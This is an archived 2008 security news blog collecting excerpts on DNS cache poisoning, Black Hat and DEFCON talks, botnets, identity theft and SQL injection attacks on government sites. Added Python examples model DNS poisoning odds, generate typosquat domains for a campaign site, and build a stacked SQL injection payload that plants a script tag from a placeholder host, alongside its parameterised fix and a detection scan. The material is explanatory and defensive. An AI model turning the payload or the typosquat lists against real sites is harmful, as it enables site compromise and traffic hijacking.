Saturday, August 09, 2008

In Passing: Bernie Mac


Bernie Mac
October 5, 1957 – August 9, 2008


Friday, August 08, 2008

DEFCON: Massachusetts Agency Sues To Stop Presentation

Dan Goodin writes on The Register:

A transit agency in New England has filed a federal lawsuit to stop three Massachusetts Institute of Technology grad students from publicly presenting research at Defcon demonstrating gaping security holes in two of the agency's electronic payment systems.

The Massachusetts Bay Transit Authority (MBTA) also named MIT in the 17-page complaint, which seeks unspecified monetary damages for violation of the computer fraud and abuse act, negligent supervision and other causes of action. It also requests a temporary order preventing the students from "publicly stating or indicating that the security or integrity" of the MBTA's systems has been compromised.

More here.

Georgia, South Ossetia Conflict Spills Over to The Web




Sergei Shevchenko writes on the Threat Expert Blog:

According to the Russian media agency Interfax, the website of the Ministry of Internal Affairs of Georgia has been defaced with a collage of photos of the Georgian President Saakashvili and Adolf Hitler.

The hacker attack coincides with the war conflict that spilled over the region of South Ossetia.

Link.

FBI Says It Improperly Obtained Reporters’ Phone Records

Via The New York Times.

The Federal Bureau of Investigation said Friday that it had improperly obtained the phone records of reporters for The New York Times and The Washington Post in the newspapers’ Indonesia bureaus in 2004.

Robert S. Mueller III, director of the F.B.I., disclosed the episode in a phone call to Bill Keller, the executive editor of The Times, and apologized for it. He also spoke with Leonard Downie Jr., the executive editor of The Washington Post, to apologize.

F.B.I. officials said the incident came to light as part of the continuing review by the Justice Department inspector general’s office into the bureau’s improper collection of telephone records through “emergency” records demands issued to phone providers.

The records were apparently sought as part of a terrorism investigation, but the F.B.I. did not explain what was being investigated or why the reporters’ phone records were considered relevant.

More here.

UK Cabinet: Cyber Attacks By China And Russia Threaten To Bring Britain To A Grinding Halt

James Chapman writes in The Daily Mail:

Cyber attacks on Government computer systems and vital parts of the economy have become one of the greatest threats to national security, an official report disclosed yesterday.

The Government confirmed for the first time that a series of electronic assaults on official and private sector databases have already been carried out and are continuing.

Though the Cabinet Office report did not identify who carried out the 'well-resourced and sophisticated attacks', Whitehall sources disclosed that China is suspected of state-sponsored espionage.

Beijing has issued furious denials that it was engaged in such practices and the timing of yesterday's warning is particularly sensitive, coming on the opening day of the Olympics.

But intelligence officials fear there is clear evidence China is mounting an aggressive push to establish 'electronic dominance' over its global rivals.

More here.

Internet 'Security Patch' May Not Do the Job

John Markoff writes on The New York Times:

Faced with the discovery of a serious flaw in the Internet’s workings, computer network administrators around the world have been rushing to fix their systems with a cobbled-together patch. Now it appears that the patch has some gaping holes.

On Friday, a Russian physicist demonstrated that the emergency fix to the basic Internet address system, known as the Domain Name System, is vulnerable and will almost certainly be exploited by criminals.

The flaw could allow Internet traffic to be secretly redirected so thieves could, for example, hijack a bank’s Web address and collect customer passwords.

In a posting on his blog, the physicist, Evgeniy Polyakov, wrote that he had fooled the software that serves as the Internet’s telephone book into returning an incorrect address in just 10 hours, using two standard desktop computers and a high-speed network link. Internet experts who reviewed the posting said the approach appeared to be effective.

The basic vulnerability of the network has become a heated controversy since Dan Kaminsky, a Seattle-based researcher at the security firm IOActive, quietly notified a number of companies that distribute Internet addressing software earlier this year.

More here.
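The excerpt above is about a race: an attacker triggers lookups for names the resolver has never seen and floods it with forged replies, and the resolver accepts the first one whose transaction ID (and, after the emergency patch, UDP source port) matches. The following is an added illustration, not code from the article or from Polyakov's blog post: a small probability model of that race, with constructed attacker rates (50,000 spoofed replies per second, 100 fresh queries per second) and an assumed 16 bits of port entropy, showing why 16 bits of transaction ID alone fell in seconds and why port randomisation only turns that into hours.

```python
"""Race-probability model for Kaminsky-style DNS cache poisoning.

Each query the attacker triggers for a fresh, never-cached subdomain opens one
race: the resolver accepts the first reply whose transaction ID (and, with the
emergency patch, whose UDP destination port) matches the outstanding query.
The attacker wins a race with probability forged_per_race / keyspace and keeps
opening races until one wins, so the number of races needed is geometric.
All rates below are constructed scenario inputs, not measurements.
"""


def keyspace(txid_bits=16, port_bits=0):
    """Number of (TXID, port) combinations the attacker must guess."""
    return 2 ** (txid_bits + port_bits)


def race_success_probability(forged_per_race, txid_bits=16, port_bits=0):
    """Chance that one race is won, assuming distinct guesses within a race."""
    return min(1.0, forged_per_race / keyspace(txid_bits, port_bits))


def success_probability(races, forged_per_race, txid_bits=16, port_bits=0):
    """Probability that at least one of `races` races succeeds."""
    p = race_success_probability(forged_per_race, txid_bits, port_bits)
    return 1.0 - (1.0 - p) ** races


def expected_seconds(forged_per_sec, races_per_sec, txid_bits=16, port_bits=0):
    """Expected wall-clock time until the first forged reply is accepted.

    forged_per_sec: spoofed replies the attacker can deliver per second.
    races_per_sec:  fresh queries the attacker can make the resolver send.
    """
    forged_per_race = forged_per_sec / races_per_sec
    p = race_success_probability(forged_per_race, txid_bits, port_bits)
    expected_races = 1.0 / p
    return expected_races / races_per_sec


if __name__ == "__main__":
    # Constructed scenario: 50,000 spoofed replies/s, 100 fresh queries/s.
    for label, port_bits in (("TXID only (16 bits)", 0),
                             ("TXID + random source port (~32 bits)", 16)):
        secs = expected_seconds(50_000, 100, 16, port_bits)
        print(f"{label:40s} expected time to poison: {secs / 3600:10.3f} h")
```

With the transaction ID alone the expected time is about 1.3 seconds; adding 16 bits of source-port entropy stretches it to roughly a day at these rates, which is the right order of magnitude for the ten-hour result reported above and is why the patch was described as raising the cost rather than closing the hole.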

DEFCON: Hackers Mull Physical Attacks On A Networked World

An AP newswire article by Jordan Robertson, via SFGate.com, reports that:

Want to break into the computer network in an ultra-secure building? Ship a hacked iPhone there to a nonexistent employee and hope the device sits in the mailroom, scanning for nearby wireless connections.

How about stealing someone's computer passwords? Forget trying to fool the person into downloading a malicious program that logs keystrokes. A tiny microphone hidden near the keyboard could do the same thing, since each keystroke emits slightly different sounds that can be used to reconstruct the words the target is typing.

Hackers at the DefCon conference here were demonstrating these and other novel techniques for infiltrating facilities Friday.

Their talks served as a reminder of the danger of physical attacks as a way to breach hard-to-crack computer networks.

More here.

Toon of The Day: The War on Terror's Underlings


Click for larger image.

Via Truthdig.com.

Enjoy.

- ferg

Former U.S. Prosecutor: UFO Hack Looked Like Terrorist Attack

Sharon Gaudin writes on ComputerWorld:

After the computer network at the Naval Weapons Station Earle in New Jersey was breached and crashed just a few weeks after the terrorist attacks of Sept. 11, 2001, investigators thought it might be part of a larger al-Qaeda plot against the United States.

Investigators worked around the clock to figure out who had been in and out of the system that runs the weapons station for about five months, stealing passwords, installing remote access software, deleting data and ultimately shutting down the network of 300 computers for an entire week. That weeklong shutdown meant that for that period of time -- in the aftermath of attacks on the U.S. -- the station couldn't do its job of replenishing munitions and supplies to the Atlantic fleet.

Was the break-in organized by a nation-state? A terrorist group? After throwing critical resources at the probe when the government was already investigating not only the 9/11 attacks but the anthrax killings, investigators didn't track the breach to al-Qaeda. They tracked it to an unemployed system administrator in the U.K. -- Gary McKinnon, who was subsequently charged with hacking into 92 computer systems at the U.S. Army, the U.S. Air Force, the Department of Defense and NASA.

More here.

Irish Credit-Card Holders Hit By Online Theft

Via The Belfast Telegraph.

Irish banks are reportedly working to cancel hundreds of credit cards following a suspected online security breach.

Reports this morning say fraudsters are believed to have hacked into the database of one the country's leading retailers to steal the credit card details of its customers.

The theft was discovered on Wednesday night after the thieves tested stolen credit card details on a US website, spending a small amount to see if they would work.

Irish banks were informed that hundreds of their customers may be at risk of identity fraud as a result and they have contacted these customers to cancel their credit cards.

More here.

U.S. Man Who Spied For China Gets Nearly 16 Years

An AP newswire article by Matthew Barakat, via SFGate.com, reports that:

A New Orleans furniture salesman who spied for the People's Republic of China and helped the Beijing government obtain secret U.S. military information was sentenced Friday to nearly 16 years in prison.

The sentence for Tai Kuo, 58, was in line with what prosecutors had requested and more than twice as long as the term sought by defense lawyers.

"I have no one to blame but myself," Kuo told U.S. District Judge Leonie Brinkema at Friday's sentencing hearing. "I'm going to shoulder this remorse and guilt for the rest of my life."

Kuo, a native of Taiwan and a naturalized U.S. citizen, masqueraded as a Taiwanese agent when in fact he was working for the government in Beijing. He convinced a Pentagon analyst to give him classified information about U.S.-Taiwanese military relations.

More here.

Dutch Police Notify Botnet Victims

A Webwereld Netherlands article by Tom Sanders, via Computerworld UK, reports that:

Police in the Netherlands have claimed a world first after warning victims whose computers were infected by a botnet that was shut down last week. The victims will be forwarded to a special web page offering instructions on cleaning up their systems.

The high-tech crime unit of the police started issuing the warnings on Wednesday. Users with infected systems are automatically sent a special page when they log onto the internet. The page offers instructions on disabling the botnet, as well as a link to Kaspersky's online virus scanner and a request to file charges against the botnet herder, a 19-year-old man from the Dutch city of Sneek who was arrested last week.

The page, which was created in cooperation with Kaspersky Labs, marks the first time that botnet victims have been proactively warned by authorities, said Eddy Willems, a virus evangelist with Kaspersky Labs in the Netherlands.

More here.

2008 Pwnie Award Winners

Via The 2008 Pwnie Award Page.

  • Best Server-Side Bug: Ryan Smith and Alex Wheeler (Windows IGMP kernel vulnerability discovery)
  • Best Client-Side Bug: Nate McFeters, Rob Carter, and Billy Rios (Multiple URL protocol handling flaws)
  • Mass 0wnage: For the mass of Wordpress vulnerabilities found this past year (and anyone who found them)
  • Most Innovative Research: Cold Boot attacks on disk encryption keys (Princeton researchers)
  • Lamest Vendor Response: McAfee, for its reaction to the over 60 Websites classified as "Hacker Safe" by its ScanAlert service that were found to be XSS-vulnerable -- including the ScanAlert Website itself.
  • Most Overhyped Bug: Dan Kaminsky's Unspecified DNS cache poisoning vulnerability.
  • Best Song: "Packing the K!" Kaspersky Lab
  • Most Epic FAIL: Debian, for shipping a backdoored OpenSSL library for two years
  • Lifetime Achievement Award: Tim Newsham

More here.

Thursday, August 07, 2008

Picture of The Day: Brett Favre is Now a Jet



And yes, I'm a big NY Jets fan.

Awesome. :-)

- ferg

Image source: NBC Sports

The Mysterious Unidentified Retailer In The TJX Indictments

Evan Schuman writes on StorefrontBacktalk:

The feds were certainly not shy about naming retail victims in the 41 million payment card heist, listing in one of the indictments TJX, BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, DSW and Forever 21.

But the mystery retailer had several differences from the other retailers. First, this retailer was the only one whose perimeter security systems detected the mouse-toting bandits, although it did so only after the binary bullies had grabbed some card numbers, including some ATM PINs.

Therein may lie the reason for this retailer's mask. On the one hand, this Fortune 500 merchant is an unsung hero in breaking this case. Not coincidentally, that chain was the final one the defendants wirelessly hacked into through a Florida wireless access point. Blocked from their last system in mid-October 2007, one of the two men charged with attempting that final cyber thievery today faces life in prison, if convicted of all charges.

More here.

Black Hat: Typosquatting the Presidential Election Websites

Dean Takahashi writes on VentureBeat:

Bad hackers haven’t caused much damage this year during the online-heavy presidential campaign. But the potential is there. Consider “typosquatting.”

There are about 160 different ways to type in the wrong web site for www.barackobama.com. Oliver Friedrichs, former director of research at Symantec, knows this because he did a study of the sites that typosquat, or exploit users' misspellings of web site names to siphon off traffic from the official candidate's web site for a variety of commercial or corrupt purposes.

At Black Hat today, Friedrichs described the typosquatting study as part of a broader talk offering a warning about how any big election could be threatened by a variety of different cyber attacks.

More here.
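An added example, not part of the article or of Friedrichs's study, showing how a typosquatting candidate list is generated so that the domains can then be resolved and checked for registration. It models four error classes (dropped character, swapped adjacent characters, adjacent-key substitution on a US QWERTY layout, doubled character); the neighbour map is constructed here and is an assumption. For the label "barackobama" this yields 76 candidates, fewer than the roughly 160 the study counted, which presumably used more error classes.

```python
"""Typo-variant generator for the registrable label of a domain."""

# Neighbouring keys on a US QWERTY layout (constructed for this example).
QWERTY_NEIGHBOURS = {
    "q": "wa", "w": "qase", "e": "wsdr", "r": "edft", "t": "rfgy", "y": "tghu",
    "u": "yhji", "i": "ujko", "o": "iklp", "p": "ol",
    "a": "qwsz", "s": "awedxz", "d": "serfcx", "f": "drtgvc", "g": "ftyhbv",
    "h": "gyujnb", "j": "huikmn", "k": "jiolm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn",
    "n": "bhjm", "m": "njk",
}


def typo_variants(label):
    """Return sorted, de-duplicated typo candidates for one DNS label."""
    out = set()
    n = len(label)
    # Dropped character: "barakobama"
    for i in range(n):
        out.add(label[:i] + label[i + 1:])
    # Swapped adjacent characters: "barcakobama"
    for i in range(n - 1):
        if label[i] != label[i + 1]:
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    # Adjacent-key substitution: "varackobama"
    for i, ch in enumerate(label):
        for nb in QWERTY_NEIGHBOURS.get(ch, ""):
            out.add(label[:i] + nb + label[i + 1:])
    # Doubled character: "baarackobama"
    for i in range(n):
        out.add(label[:i] + label[i] + label[i:])
    out.discard(label)          # the genuine name is not a squat
    return sorted(v for v in out if v)


def typosquat_domains(domain):
    """Candidate typo domains for a name such as 'barackobama.com'.

    Only the last label before the TLD is mutated; strip any 'www.' first.
    """
    label, _, tld = domain.rpartition(".")
    return [f"{v}.{tld}" for v in typo_variants(label)]


if __name__ == "__main__":
    cands = typosquat_domains("barackobama.com")
    print(len(cands), "candidates, e.g.", cands[:5])
```

The next step in such a study is to resolve each candidate and record which ones answer, who registered them and where they redirect; that part depends on live DNS and WHOIS and is left out here.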

Reporters Without Borders Make Pirate Broadcast in Beijing

Jane Macartney writes in The Times Online:

The world’s best-known advocate of freedom of the media took its message to the heart of Beijing this morning, making a pirate broadcast on Chinese radio exactly 12 hours to the minute before the start of the Olympics opening ceremony.

Paris-based Reporters Without Borders began broadcasting on local FM radio to several districts of Beijing at 8.08 a.m local time (0000 GMT), denouncing China’s grip on media and expression. The broadcast, in both English and Mandarin Chinese, while often indistinct, lasted for 20 minutes.

In the latest embarrassing breach of China’s massive security operation, the group used the FM 104.4 frequency to demand the release of political prisoners and the lifting of censorship. A voice at the start of the broadcast said: “China is the country of censorship, and this programme is our way of making fun of the Chinese authorities who still keep hundreds of journalists and Internet users in prison."

More here.

Black Hat: 'Windows Jingle Attack' Exposed

Thomas Claburn writes on InformationWeek:

At the Black Hat conference in Las Vegas on Thursday, Eric Filiol, the head scientist at the French Signals Academy's Virology and Cryptology Lab, explained how to steal data from a computer without a network connection.

Filiol demonstrated what he called the Windows Jingle Attack, a method for encoding a user's password into audio data and concealing that data in the Windows start-up tone, a publicly audible sound that can be read from afar with a local or remote microphone and then decoded.

The Windows Jingle Attack requires malware on the target machine, so in that respect it's not as easy to execute as other attacks that allow remote code execution. Nonetheless, there are certain scenarios when being able to obtain data from a computer without a network connection would be valuable.

There's precedent for related attacks in the intelligence community. In 1987, the NSA found that the KGB had replaced the circuit boards and power cords in the U.S. Embassy in Moscow in order to covertly siphon message data.

More here.

American Deaths in Afghanistan War Reach 500


An AP newswire article by Jason Straziuso, via The Boston Globe, reports that:

The deadliest three months for American forces in Afghanistan have pushed the U.S. death toll to at least 500, forcing a war long overshadowed by Iraq back into the headlines.

Larger, more sophisticated militant attacks have also caused a sharp rise in Afghan civilian deaths -- at least 472 in the first seven months of the year, most in suicide bombings, according to an Associated Press count.

There are about 33,000 U.S. troops in Afghanistan, the highest since the war began, meaning more troops than ever are patrolling this country's mountainous terrain and exposed to ambushes and roadside bombs.

The U.S. military suffered 65 deaths in May, June and July, by far the deadliest three-month period in Afghanistan since the war began in 2001. The previous deadliest three-month period was in the spring of 2005, with 45 U.S. deaths.

More here.


'How I Got Hacked at Black Hat'

Brian Prince writes on eWeek:

So as some of you may have already read by now, one of our brilliant cyber-minds at eWEEK who will remain nameless (Brian Prince…oh wait…damn!) entered one of his passwords in the clear and had it intercepted at this year’s Black Hat conference.

Alas, I broke one of the cardinal rules of security and, but for the grace of the Black Hat conference staff, would have had my name added to the infamous Wall of Sheep.

Here’s the back story: a group of journalists representing Global Security Mag, one of the media sponsors of the event, decided it would be a good idea to see if they could catch some of their fellow journalists insecurely accessing the Web via the local area network (LAN) in the conference pressrooms.

More here.

Note: Robert Vamosi also has some additional details on this over at C|Net News here.

Mark Fiore: The All New EPA



More Mark Fiore brilliance.

Via The San Francisco Chronicle.

Enjoy!

- ferg

Black Hat: Hackers: Uncle Sam Wants You

Sean Michael Kerner writes on internetnews.com:

The U.S. government is actively engaged in the fight to help protect against Internet threats and cybercrime. And speaking before a packed ballroom here at the Black Hat security conference, they made it clear they want hackers to join the effort.

"The reason why we come here is we hope to attract folks to government service," said James Finch, assistant director of the FBI's cyber division. "And if we can't get you in service, then we want partnerships on working on security issues."

Those issues brought a handful of representatives from U.S. government agencies -- including the Department of Homeland Security's U.S. Computer Emergency Readiness Team (US-CERT), the FBI, NASA, the National Security Agency, the Naval Criminal Investigative Service, the Internal Revenue Service and the U.S. Air Force -- to speak to hackers and security experts here at Black Hat.

More here.

Black Hat: Windows Vista Security 'Rendered Useless' by Researchers

Dennis Fisher writes on SearchSecurity:

Two security researchers have developed a new technique that essentially bypasses all of the memory protection safeguards in the Windows Vista operating system, an advance that many in the security community say will have far-reaching implications not only for Microsoft, but also on how the entire technology industry thinks about attacks.

In a presentation at the Black Hat briefings, Mark Dowd of IBM Internet Security Systems (ISS) and Alexander Sotirov, of VMware Inc. will discuss the new methods they've found to get around Vista protections such as Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP) and others by using Java, ActiveX controls and .NET objects to load arbitrary content into Web browsers.

By taking advantage of the way that browsers, specifically Internet Explorer, handle active scripting and .NET objects, the pair have been able to load essentially whatever content they want into a location of their choice on a user's machine.

More here.

Feingold: Chertoff Misleads on Laptop Searches

Senator Russ Feingold (D-Wisconsin)

Ryan Singel writes on Threat Level:

Democratic Sen. Russ Feingold opposes border agents searching through Americans' laptops without cause, and he doesn't like how Homeland Security Chief Michael Chertoff articulated the government's current policy in an interview with Threat Level on Monday.

In that conversation, Chertoff said that in practice, border agents rely on a real suspicion to decide whose laptop to look into or even seize, but that he opposes creating a legal standard for searching Americans' electronics at the border since it would just lead to too much litigation.

Feingold, an outspoken civil libertarian -- the only senator to vote against the Patriot Act -- begs to differ.

More here.

Favre Jets Jersey Blitz Crashes Team's Web Store

Paul McDougall writes on InformationWeek:

The New York Jets' online store was offline for parts of Thursday as fans rushed to be among the first to purchase a jersey bearing quarterback Brett Favre's famously difficult-to-pronounce last name and No. 4 player number.

Demand for the jerseys was such that JetShop.com was either offline completely, or had slowed to a crawl, for much of the day.

The site, when available, showed the Favre jerseys for sale at $80, but it warned customers "to allow extra time, regardless of shipping method," to receive their order.

Jets fans desperate to own an emerald-and-white team sweater bearing the Mississippi native's credentials had other, more expensive, Internet options. Favre Jets jerseys were selling on eBay Thursday for as much as $300.

The Jets aren't the first organization to be caught napping by a sudden spike in Web traffic and likely won't be the last.

More here.

Black Hat: New U.S. Cyber Defense Coordinator Hints at Plans

An AP newswire article by Jordan Robertson, via SFGate.com, reports that:

One of the United States' biggest challenges in securing government computers from foreign attacks isn't necessarily technical. The country first needs to figure out how much those networks are worth and how much the U.S. should spend on protecting them, the new Homeland Security official in charge of that effort said Thursday.

Rod Beckstrom, director of the newly created National Cyber Security Center, an agency responsible for protecting the government's computer networks, was making his first major address to the computer security community. He steered clear of specifics in his hourlong talk at the Black Hat hacker convention, because he said the agency is still developing its plans.

More here.

Patch Tuesday: Microsoft Will Patch 12 Vulnerabilities

Ryan Naraine writes on the ZDNet "Zero Day" Blog:

Next Tuesday (August 12th), Microsoft will ship 12 security bulletins with fixes for serious vulnerabilities in a wide range of widely deployed products.

Seven of the 12 bulletins will be rated “critical,” Microsoft’s highest severity rating.

The critical bulletins will cover remotely exploitable flaws in Internet Explorer, Windows Media Player, MS Excel, MS PowerPoint, MS Access, MS Office and the Windows operating system.

The other five will carry an “important” rating and will include patches for bugs in Windows, Outlook Express, Windows Mail, Windows Messenger and Microsoft Word.

More here.

SQL Attacks Inject Government Sites in U.S., UK

Dan Goodin writes on The Register:

A new round of SQL injection attacks has infected millions of web pages belonging to businesses and government agencies, including those that belong to the National Institutes of Health and Education Department in the US and the UK Trade & Investment.

This search shows at least 1.45 million infected pages and queries here and here out some of the US and UK government websites that have been hit by the attack. Not exactly reassuring to know that government-run websites are open to such a basic attack.

We strongly recommend not clicking on the infected sites unless you know what you're doing. Punters unfortunate to land on infected pages that are still live can wind up at sites "where a CGI script starts the road of pain," according to this post from SANS.

More here.
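The attacks above succeed because a request parameter is pasted into a SQL string. The following is an added example (not code from The Register, SANS or any affected site) that puts the vulnerable query beside its parameterised form and adds the check a responder wants afterwards: a scan of every text column for an appended external script tag, which is the footprint these mass injections leave. It uses an in-memory SQLite database with constructed rows; the injected URL is a placeholder, and because sqlite3's execute() refuses stacked statements, the stacked UPDATE is replayed with executescript() to show what a driver that allows stacking would do.

```python
"""SQL injection: vulnerable vs. parameterised lookup, plus a post-incident
scan for injected <script src=...> tags across all text columns."""
import re
import sqlite3

INJECTED_TAG = '<script src="http://example.invalid/x.js"></script>'  # constructed
SCRIPT_RE = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def setup():
    """Constructed sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE pages(id INTEGER PRIMARY KEY, slug TEXT, body TEXT);"
        "INSERT INTO pages(slug, body) VALUES ('home', 'Welcome'), ('about', 'About us');"
    )
    return conn


def vulnerable_sql(slug):
    # The request parameter becomes SQL syntax: anything after a closing
    # quote is executed as part of the statement.
    return "SELECT slug FROM pages WHERE slug = '" + slug + "' ORDER BY rowid"


def lookup_vulnerable(conn, slug):
    return [row[0] for row in conn.execute(vulnerable_sql(slug))]


def lookup_safe(conn, slug):
    # Bound parameter: the value never becomes syntax, whatever it contains.
    return [row[0] for row in conn.execute(
        "SELECT slug FROM pages WHERE slug = ? ORDER BY rowid", (slug,))]


def mass_injection_slug():
    """Shape of a mass-injection payload: close the string, stack an UPDATE
    that appends a script tag to every row, comment out the remainder."""
    return "x'; UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"


def replay_stacked(conn, sql):
    # sqlite3.execute() rejects stacked statements; executescript() replays
    # what a driver permitting them would run against the database.
    conn.executescript(sql)


def find_injected_script(conn):
    """Flag (table, column, rowid) for every TEXT cell holding an external
    <script src=...>. Identifiers come from the catalogue, not user input."""
    hits = []
    for (table,) in conn.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table'"):
        cols = [c[1] for c in conn.execute(f"PRAGMA table_info('{table}')")
                if (c[2] or "").upper() == "TEXT"]
        for col in cols:
            for rowid, value in conn.execute(
                    f'SELECT rowid, "{col}" FROM "{table}"'):
                if value and SCRIPT_RE.search(value):
                    hits.append((table, col, rowid))
    return hits


if __name__ == "__main__":
    conn = setup()
    probe = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(conn, probe))   # every row
    print("safe:      ", lookup_safe(conn, probe))         # nothing
    replay_stacked(conn, vulnerable_sql(mass_injection_slug()))
    print("infected cells:", find_injected_script(conn))
```

The scan is the cleanup starting point, not the fix: the rows can be restored from backup, but the pages stay "open to such a basic attack" until every string-built query is replaced with a bound-parameter one.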

UK Government Pays Telcos £18.5M For Records Retention

Via OUT-LAW.com.

The Government has paid £18.5 million over five years to telecoms firms for access to data about citizens' use of phones and the internet. The figures took a sharp upturn in 2006 and last year reached £8.3 million.

In 2003 Parliament agreed a code of practice for the retention of communications data by the telecoms industry. The Anti-terrorism, Crime and Security Act (ATCSA) of 2001 and the EU's 2007 Data Retention Directive both made it possible for the Government to pay grants to service providers to cover the cost of keeping that data though they did not demand payment.

Security minister Admiral Lord West has released information about the amounts the Government has paid in grants to telecoms firms for keeping that data.

In 2007 10 grants were made totalling £8.3 million. In the first year of the scheme, 2004, four grants were made which accounted for just £84,582 in total. In the first seven months of this year £4.1 million was paid out in five grants.

More here.

Wednesday, August 06, 2008

Secret EU Security Draft Gives U.S. Access to Personal Data

Ian Traynor writes in The Guardian:

Europe should consider sharing vast amounts of intelligence and information on its citizens with the US to establish a "Euro-Atlantic area of cooperation" to combat terrorism, according to a high-level confidential report on future security.

The 27 members of the EU should also pool intelligence on terrorism, develop joint video-surveillance and unmanned drone aircraft, start networks of anti-terrorism centres, and boost the role and powers of an intelligence-coordinating body in Brussels, said senior officials.

The 53-page report drafted by the Future Group of interior and justice ministers from six EU member states - Germany, France, Sweden, Portugal, Slovenia, and the Czech Republic - argues Europe will need to integrate much of its policing, intelligence-gathering, and policy-making if it is to tackle terrorism, organised crime, and legal and illegal immigration.

The report, seen by the Guardian, was submitted to EU governments last month following 18 months of work. The group, which also includes senior officials from the European Commission, was established by Germany last year and charged with drafting a blueprint for security and justice policy over the next five years.

More here.

UK: 'Fakeproof' e-Passport is Cloned in Minutes

Steve Boggan writes in The Times Online:

New microchipped passports designed to be foolproof against identity theft can be cloned and manipulated in minutes and accepted as genuine by the computer software recommended for use at international airports.

Tests for The Times exposed security flaws in the microchips introduced to protect against terrorism and organised crime. The flaws also undermine claims that 3,000 blank passports stolen last week were worthless because they could not be forged.

In the tests, a computer researcher cloned the chips on two British passports and implanted digital images of Osama bin Laden and a suicide bomber. The altered chips were then passed as genuine by passport reader software used by the UN agency that sets standards for e-passports.

More here.

ID Thefts at England Air Force Bases Total $70,000

Geoff Ziezulewicz writes in The Stars and Stripes (European Edition):

Thieves spent $650 on a shopping spree at Bloomingdale's in New York City and more than $1,100 at various Canadian businesses in just two cases of identity theft reported in the past month within Air Force communities in England.

Sixty-six victims reported losses totaling $37,917 at RAF Lakenheath from July 5 to Aug. 5.

Victimsf bank accounts were hacked and duplicate debit cards were created to make purchases all over North America, from Canada to Mexico and throughout the States, according to statistics provided by Lakenheathfs 48th Security Forces Squadron.

Approximately 150 identity theft incidents totaling about $70,000 were reported within the RAF Mildenhall and Lakenheath communities in the past month, according to Air Force investigators.

More here.

Hat-tip: Pogo Was Right

Black Hat: Kaminsky: Many Ways to Attack DNS

Robert McMillan writes on ComputerWorld:

There were 6 a.m. calls from Finnish certificate authorities and also some pretty harsh words from his peers in the security community -- even an accidentally leaked Black Hat presentation. But after managing the response to one of the most highly publicized Internet flaws in recent memory, Dan Kaminsky said Wednesday that he'd do it all over again.

Kaminsky's full-time job over the past few months has been working with software vendors and Internet companies to fix a widespread flaw in the DNS (domain name system) used by computers to find each other on the Internet. Kaminsky, in conjunction with an assortment of pre-alerted tech vendors and experts, first disclosed the problem on July 8, warning corporate users and Internet service providers to patch their software as quickly as possible.

On Wednesday, he disclosed more details of the issue during a crowded session at the Black Hat conference, describing a dizzying array of attacks that could exploit DNS. Kaminsky also talked about some of the work he'd done to fix critical Internet services that could also be hit with this attack.

More here.

Black Hat: 500G of Personal Data Captured by CoreFlood Botnet

William Jackson writes on GCN.com:

A cache of stolen data gathered from a botnet that has been quietly sweeping up information for years contained the user names and passwords for:

  • 8,485 bank accounts
  • 3,233 credit card accounts
  • 151,000 e-mail accounts
  • 58,391 social networking site accounts
  • 4,237 online retailer accounts
  • 416 stock trading accounts
  • 869 payment processor accounts
  • 413 mortgage accounts
  • 422 finance company accounts


The Coreflood Trojan responsible for the infections has been around in one form or another since 2002, said Joe Stewart, director of malware research for SecureWorks Inc. The botnet is being used by a Russian crime group on whose command and control server Stewart found the stolen information. The data, which amounts to nearly 500 gigabytes, represents only six months of operations.

“They had erased the previous directories, probably because they didn’t have room to keep it,” Stewart said.

He estimated the group has stolen four times that amount of data, giving them access to accounts worth millions.

Stewart shared some of his research on Coreflood Wednesday at the Black Hat Briefings security conference. Because the Trojan has been circulating largely under the radar and spreads throughout an organization using a network administrator’s privileges, it can be particularly insidious, he said.

More here.

UK Questioned on Phorm

Via The BBC.

The UK government has until the end of August to respond to a letter from the European Union about a controversial system which monitors web traffic.

EU commissioner Viviane Reding has asked the UK government to clarify whether the Phorm system is in breach of European data laws.

Phorm tracks users' web habits in order to better target ads at them and three UK ISPs are so far signed up to it.

BT is due to begin a widescale trial of the service imminently.

More here.

Black Hat: EFF Launches Coders' Rights Website

John Timmer writes on ARS Technica:

The Electronic Frontier Foundation is using the Black Hat USA conference, taking place in Las Vegas, to launch a site designed to help security researchers navigate the treacherous legal waters they face when exploring the vulnerabilities in commercial software. The EFF will be making lawyers available at its booth on the conference floor, but the long-term aid will come in the form of a Coders' Rights web site that aggregates relevant legal information from elsewhere on the EFF site. Although the site is information-rich, it's not meant as a standalone resource: the phrase "talk to a lawyer" appears throughout its content.

The project is being spearheaded by the EFF's Civil Liberties director Jennifer Granick. "Coders who explore technology through innovation and research play a vital role in developing and securing the software and hardware we use everyday," she stated in announcing the site. "Yet this important work can be stymied by bogus legal threats."

More here.

Tuesday, August 05, 2008

Black Hat: Why It Is Probably Overrated


So you've probably heard me mention previously that I won't be in Vegas for Black Hat or DefCon this year -- and here's why: Yawn.

First: I hate Vegas.

Second: I will know everything the attendees know, on the same day, in the same detail, and without attending. And probably in more detail -- because most attendees are afraid to actually network because of roaming threats. But that's another issue altogether. Plus, I actually know most of these guys anyways. :-)

Third: The attendees at Black Hat and DefCon just aren't in my professional "social circle", but aside from that, there's just no real "fun factor" there for me. Blah.

Fourth: It's a great boondoggle, but I just really didn't feel like attending this year. The crowds will be larger, the "Lulz" factor will be higher. No thanks.

But for those attending: Have fun! Have a couple of tequila shooters for me. :-)

I'll be back here battling cyber thieves and other menaces. As usual.

- ferg

U.S. Military Study Looked to Rome for Lessons


Noah Shachtman writes on Danger Room:

The Pentagon's legendary Office of Net Assessment is known for peering into the future of conflict [.pdf] -- at subjects like wartime biotech, fighting robots, networked battles, and the military in space. The office's head, Andrew Marshall, has been called the Pentagon's "futurist-in-chief." But for one study, concluded in 2002, Net Assessment-funded researchers looked back, to the empires of Alexander the Great, Imperial Rome, Genghis Khan, and Napoleonic France.

The study, "Military Advantage in History,"[.pdf] examines these "pivotal hegemonic powers" to draw lessons about how the United States "should think about maintaining military advantage in the 21st century." Mother Jones' Justin Elliott obtained the report through the Freedom of Information Act.

